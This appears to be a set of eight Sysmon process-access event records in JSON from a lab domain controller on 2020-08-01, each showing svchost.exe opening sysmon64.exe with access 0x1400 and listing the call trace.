{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2716,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2717,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2718,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2719,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2720,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2721,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2722,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2723,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
